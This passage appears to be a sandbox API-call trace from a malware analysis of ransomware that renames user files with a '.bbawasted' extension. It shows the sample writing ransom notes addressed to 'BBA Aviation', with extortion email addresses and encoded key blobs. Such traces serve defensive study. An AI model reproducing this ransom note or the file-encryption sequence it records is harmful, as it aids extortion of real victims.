KEY:\r\n[begin_key]VJddM6siQTDv468rwnuiNF2BvTM7e+3PIJfHx6hlzpGDJk/Tt9HY4xDbqCkwpgfo\r\nu7YFS41OIQftV/W5N//yvSwrKNk5IlRsb1J0ImAyKFdrOqySUBf3iv2sKRH2dTPu\r\naZEM7xEsWpTcjT4ZIFsIeMMx+tUlVPxxVtHbucf1fRhRJ0co3DkorvXbogH+Tiur\r\niBqreG3xCdJDQLLQbBRxWciweAEKA5FtIS/4VbEgP2daDl+S9PzkTHyK5JsPCtMS\r\nSUdPicHJE/khv+kznfg+egmg0tpt1YbFnFvqgEaBXq1TxSTp53UOdxtNruMlYH7J\r\nnm3H1zKG3dWrj7q3nnUOs8cXo0sxtNENuethHrJn9of9X413iYIvspAxVAuqcQLR\r\nSFfmb+kGlp0gmwFYmYDjA7mWY/f1DLUDuF9AeQZ+xZew+962gwq0n/oMxn0dO20k\r\nv9OWb1TQiAzwcbGJZEX46W11AeC001X5sDshEGjXvye7zoth5bEObHW0ajAA2I5J\r\nZMzX7roJ5PE2kymf1IhAVEf+MZGaZTeGNVtSy/CtxRIvjaF27NlVN843iwQRaUTj\r\nQNPLLq+fBArBd+MOxW7ocGaWRpGLK09PfkfvirzguyOPP0w9B+lilfZ6/07gt9TG\r\nk6LD3dJKa0auGegtdlkbL3BQsd2733CFE5JPfD4bxgI=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.974] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0227.974] SetEndOfFile (hFile=0x290) returned 1 [0227.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.977] CloseHandle (hObject=0x290) returned 1 [0227.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0227.977] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bd440 | out: hHeap=0x660000) returned 1 [0227.978] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a63d8) returned 1 [0227.978] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0227.978] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0227.978] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zJqianO.png") returned 40 [0227.978] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25a) returned 0x6adb18 [0227.979] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.979] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.979] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a5f10) returned 1 [0227.979] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.979] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0227.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zJqianO.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqiano.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0227.980] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.982] SetEndOfFile (hFile=0x290) returned 1 [0227.982] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.982] lstrcpyW (in: lpString1=0x6adb68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zJqianO.png" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqiano.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zJqianO.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqiano.png.bbawasted")) returned 1 [0227.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\zJqianO.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\zjqiano.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0227.983] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0227.983] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xaddb [0227.984] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaddb) returned 0x600000 [0227.984] CloseHandle (hObject=0x280) returned 1 [0227.985] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0227.986] CloseHandle (hObject=0x294) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0227.986] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a68a0) returned 1 [0227.987] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0227.987] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0227.987] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0227.987] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0227.987] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0228.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.267] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.267] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]V58YFV1n/Ci4V3/9dY6fYt0KX6KD1VCUKMdUXJ/KD8+5qoptZ6XYV9+Dw/5v2Bf6\r\n2TZyZREBs8geJvBhz2vjlhhmW/45yrG3VEyVCkdH5yoIen3Ih++AzNGyqHf1RnNO\r\n9F2iFdjTSreJT3uwdVPbt9S14V7LgMnqtrBwuy7USuLscd8aLBEM7l/5xoewsWD9\r\n2fbFMa9vK5px4aGGGA8hNpmsoopDUgYXxAa4tAix+e1MRy+BVyKMac80z3bu3Rxc\r\nrt2v2KMraVyf1gF6hXAjpUk33J+1ZEI/ySZkZaKR6etxoFdlZB/c/BsfT6Dfeecr\r\nlFc8EGSHBYWk6X6IRkjAYanufkCHKQ2ONk36wMJCMexEMPdWQwCzQ0E0RqDnVic6\r\nhNhEjWPvQxlB3+Tid80zpniTPKpT7Yy+cZqXYKiPIseBm9fi+oFx2Xzkl1kAL7Qm\r\nMN8dbYoJqjtbPnMa6DpI+j6eUt3EZ1HxS6PWciYyV7tzI3LFihddwtVZC6k8Rq1z\r\nXVGCUUfZ3KD9JJ07aKCl5BqoBnBo2IDhpiy1erj8Ag7SgRQHHkZ03+Y9O6q4L3lQ\r\nntHS4FSAbratjkHZJhowLd5I3l8RLWC34ucBZcH5bnyuBu5SNoOhdJuj+ANRpOvR\r\nfh6mpGmaKbcGX7oN4AFPlVURkWb7fAC8nayCBVV4s8F=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.267] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.267] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0228.267] SetEndOfFile (hFile=0x290) returned 1 [0228.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.270] CloseHandle (hObject=0x290) returned 1 [0228.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0228.270] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4a38 | out: hHeap=0x660000) returned 1 [0228.271] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6130) returned 1 [0228.271] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0228.271] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0228.271] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_xi7UdEH7chIZpFzt.png") returned 50 [0228.271] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a1538 [0228.272] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.272] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.272] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0228.272] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.272] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0228.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_xi7UdEH7chIZpFzt.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\_xi7udeh7chizpfzt.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0228.274] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.275] SetEndOfFile (hFile=0x290) returned 1 [0228.275] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.275] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.275] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_xi7UdEH7chIZpFzt.png" (normalized: "c:\\users\\fd1hvy\\pictures\\_xi7udeh7chizpfzt.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_xi7UdEH7chIZpFzt.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\_xi7udeh7chizpfzt.png.bbawasted")) returned 1 [0228.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\_xi7UdEH7chIZpFzt.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\_xi7udeh7chizpfzt.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0228.277] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0228.277] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x7a99 [0228.277] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a99) returned 0x5f0000 [0228.277] CloseHandle (hObject=0x27c) returned 1 [0228.278] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0228.279] CloseHandle (hObject=0x294) returned 1 [0228.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.279] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a68a0) returned 1 [0228.280] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.280] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0228.280] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6790) returned 1 [0228.281] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0228.281] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0228.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.293] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jaiz1pXS+mqlGk5aA8/zIG7RGbk/TB5p/E95f71qAgBxvsO1KOCNyumGF84GfN2N\r\noiBIsKgoPgdPeZyRa6Tz0bdQOfDYfEd+G+ppRbU8Ps0RtEh0M/lThaIeoWavJlIS\r\ngwNS+JylX4111ir9ZCatqJi4O766ZoJ/xmPh7V1scrkQQcfXhdTWEjpwTKjzIZY9\r\noLFQjOrw0PwGf2QYgLnE3vBmF45CcWqMhoSwXpQftTbuRNNCklu3d/y+jxObcC9u\r\nTtfbiHD7S4UQGDeLdK7HkK00E0ca/Ja396rRqxu8scvr/DhF/K8t0n10ZjOERqx7\r\n5FYPNEIxsLKRO9oUWIAqhlwCRB4e62X0AAtgzsmcf926JUM9kflBopf1my8dDfa7\r\n6szx59qjTrKi6uTI5xjoe6BR/6S+9IcyxdJNSMZg1gRYfZ8qkKvUMZD8LrZnbpkK\r\nxtt8ElcAhBi2hwlkCwfeBpheAZBGb04IqtzrayML3F7g/t4lqsxeUAieolY9kGnt\r\nukWpxOSNzr3jLrhnHIW/fJQ6/YXvAOEghJ3lXLEgssSMC+BEZ/aOxPezaatd4bPD\r\nDUZ0vfUon985PvvUAo7kI96YWZfTmUZBd+WfpJaircB88X1aZAQy8wfeJdrMhFbA\r\nwD9n5L9CbN1iKHdoJ4D8wLL5V7/r5S4lcAgmQLMxmAE=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.293] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0228.293] SetEndOfFile (hFile=0x290) returned 1 [0228.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.296] CloseHandle (hObject=0x290) returned 1 [0228.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0228.297] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b23b0 | out: hHeap=0x660000) returned 1 [0228.297] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0228.298] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0228.298] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0228.298] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned 49 [0228.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a1a48 [0228.298] lstrcpyW (in: lpString1=0x6a1aaa, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0228.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.298] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0228.299] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0228.299] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0228.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0228.300] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0228.470] SetEndOfFile (hFile=0x290) returned 1 [0228.915] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0228.915] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.915] lstrcpyW (in: lpString1=0x6a1aaa, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0228.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.bbawasted")) returned 1 [0228.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.919] GetLastError () returned 0x5 [0228.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.bbawasted")) returned 0x23 [0228.919] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0228.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0228.919] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0228.920] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xf8 [0228.920] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x600000 [0228.920] CloseHandle (hObject=0x294) returned 1 [0228.921] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0228.921] CloseHandle (hObject=0x280) returned 1 [0228.921] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0228.921] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0228.921] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f98) returned 1 [0228.922] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0228.922] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0228.922] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0228.923] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0228.923] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0228.933] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0228.934] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0228.934] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0228.934] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QcRRU4sMonn9HdNAMc6LUmwU7ghiQM1pXqSDxaFCjOm0+TWupwguEFnLVMVy+kuw\r\nG69QcCkXm0bMyNfxI/l7LrIbOmpJyxOrSHWuzGHq2j1x65zG1njMJC/44B2dvqOI\r\nW6nxqntTdUZycgeZvw0kIz18Cgo+xLIyeVcrE0t86yRoO1IO52jihp31XcPpCTrD\r\nZ199Uk1oLyauWy0pVyqL0TRzUu6VVLcGBjg5CJsJcr2RmnpjeaCaWWWccODcwt9w\r\nKT8i62iylrmO0gcUi0x05o+Gr+iIQ3SIZ8WO3Hdx1lbKOq851Q1/JTLCwLSnyjXP\r\nEVX3tDIBxcDt2r10DoupZdeBqBrM9OuPwJsxFwflfwFCBMU6O4YpaERAcO7PaMCE\r\nY1YQmY9M+8amT1PwtgqcmbNVkLVa+yOOr50Le8cSksNcBMDb9CqOdC7P5qXovlXz\r\nietZkN3aeS5Y159aGUO2haotcRgfrKifVf6kWu8McRBuSM6Zd6aCkuqf6wFNaLgX\r\n2Xt5FdyawyQAYZpc63y7JjfChwYm0twmF77/oYZnW3678e1rguepj7cC16gntXJk\r\nYwgXKn6fNrzCknArs1OcU4Ovo+65KfB7l5CZixo9X92hRWqYkzZeA9k6Q99kiQmW\r\nV1r7MqyJOmlZYWT4jYyAHncvz2SZKl7bej5PqcbwU+T=[end_key]\r\nKEEP IT\r\n") returned 984 [0228.934] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0228.934] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0228.934] SetEndOfFile (hFile=0x290) returned 1 [0228.936] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0228.936] CloseHandle (hObject=0x290) returned 1 [0228.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1a48 | out: hHeap=0x660000) returned 1 [0228.937] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1cf0 | out: 